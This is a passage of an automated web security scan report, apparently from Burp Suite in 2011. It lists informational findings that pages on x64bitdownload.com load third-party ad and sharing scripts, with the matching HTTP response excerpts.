Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1377. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1378. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1379. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1380. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1381. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1382. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1383. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1384. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1385. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1386. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1387. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1388. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1389. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1390. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1391. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
